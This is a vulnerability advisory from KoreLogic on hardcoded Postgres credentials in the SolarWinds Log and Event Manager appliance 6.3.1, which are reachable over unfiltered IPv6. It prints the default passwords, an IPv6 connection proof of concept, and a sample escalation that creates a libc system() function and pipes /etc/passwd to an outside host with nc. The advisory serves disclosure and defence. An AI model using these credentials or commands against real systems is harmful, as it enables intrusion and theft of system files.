The Postgres database on Solarwinds Log and Event Manager Virtual Appliance version 6.3.1 has default hardcoded credentials. While some security measures were taken to ensure that network connectivity to the Postgres database wouldn't be possible using IPv4, the same measures were not taken for IPv6.
4e7e118ac368bf03b24ea4b720727c1b
KL-001-2017-009 : Solarwinds LEM Database Listener with Hardcoded Credentials
Title: Solarwinds LEM Database Listener with Hardcoded Credentials
Advisory ID: KL-001-2017-009
Publication Date: 2017.04.24
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-009.txt
1. Vulnerability Details
Affected Vendor: Solarwinds
Affected Product: Log and Event Manager Virtual Appliance
Affected Version: v6.3.1
Platform: Embedded Linux
CWE Classification: CWE-798: Use of Hard-coded Credentials,
CWE-284: Improper Access Control
Impact: Remote Database Compromise
Attack vector: psql
2. Vulnerability Description
The Postgres database has default hardcoded credentials.
While some security measures were taken to ensure that network
connectivity to the Postgres database wouldn't be possible
using IPv4, the same measures were not taken for IPv6.
3. Technical Description
Reviewing netstat for listening services shows that the postgres
service is bound to both IPv6 and IPv6 interfaces.
--(0)-[1.3.3.8]-[6.3.1]-[root@swi-lem]--
/ # netstat -apn|grep postgres
tcp 0 0 0.0.0.0:5432 0.0.0.0:* LISTEN 949/postgres
tcp6 0 0 :::5432 :::* LISTEN 949/postgres
udp 0 0 127.0.0.1:58654 127.0.0.1:58654 ESTABLISHED 949/postgres
unix 2 [ ACC ] STREAM LISTENING 4622 949/postgres /var/run/postgresql/.s.PGSQL.5432
An iptables REJECT entry exists for IPv4. This prevents remote
network connectivity.
--(0)-[1.3.3.8]-[6.3.1]-[root@swi-lem]--
/ # iptables -L|grep postgres
REJECT tcp -- anywhere !localhost tcp dpt:postgresql reject-with icmp-port-unreachable
However, there are no entries in the ip6tables at all, and
the default policy is ACCEPT.
--(1)-[1.3.3.8]-[6.3.1]-[root@swi-lem]--
/ # ip6tables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
Additionally, two accounts exist with default and simple
credentials.
--(0)-[1.3.3.8]-[6.3.1]-[root@swi-lem]--
/ # head -n 5 /usr/local/contego/scripts/database/pgsql/flow.sql
CREATE ROLE trigeo WITH CREATEDB LOGIN PASSWORD 'rootme';
CREATE ROLE contego WITH CREATEDB LOGIN PASSWORD 'reports';
CREATE DATABASE alertdb WITH OWNER trigeo;
ALTER DATABASE alertdb OWNER TO trigeo;
No further testing was conducted against the Postgres
service. However, the following may be possible.
1. Connect to Postgres using hardcoded credentials over IPv6.
2. Run CREATE OR REPLACE FUNCTION which ties to system() in libc.so.6.
Example: CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS /lib/libc.so.6, system LANGUAGE C STRICT;
privSELECT system(cat /etc/passwd | nc 1.3.3.6 8080);
Example credit: http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet
3. Run system() calls to run commands on the underlying operating system as
the postgres user.
4. Mitigation and Remediation Recommendation
The vendor has released a Hotfix to remediate this
vulnerability. Hotfix and installation instructions are
available at:
https://thwack.solarwinds.com/thread/111223
5. Credit
This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.
6. Disclosure Timeline
2017.02.16 - KoreLogic sends vulnerability report and PoC to
Solarwinds <[email protected]> using PGP key
with fingerprint
A86E 0CF6 9665 0C8C 8A7C C9BA B373 8E9F 951F 918F.
2017.02.20 - Solarwinds replies that the key is no longer in
use, requests alternate communication channel.
2017.02.22 - KoreLogic submits vulnerability report and PoC to
alternate Solarwinds contact.
2017.02.23 - Solarwinds confirms receipt of vulnerability
report.
2017.04.06 - 30 business days have elapsed since Solarwinds
acknowledged receipt of vulnerability details.
2017.04.11 - Solarwinds releases hotfix and public disclosure.
2017.04.24 - KoreLogic public disclosure.
7. Proof of Concept
swi-lem$ ifconfig
eth0 Link encap:Ethernet HWaddr 52:54:00:12:34:56
inet addr:192.168.53.76 Bcast:192.168.53.255 Mask:255.255.255.0
inet6 addr: fe80::5054:ff:fe12:3456/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:681 errors:320 dropped:0 overruns:0 frame:320
TX packets:513 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:82845 (80.9 KiB) TX bytes:59151 (57.7 KiB)
sploit$ ncat -4 192.168.53.76 5432
Ncat: Connection refused.
sploit$ ncat -6 -v fe80::5054:ff:fe12:3456%br0 5432
Ncat: Version 7.40 ( https://nmap.org/ncat )
Ncat: Connected to fe80::5054:ff:fe12:3456:5432.
The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt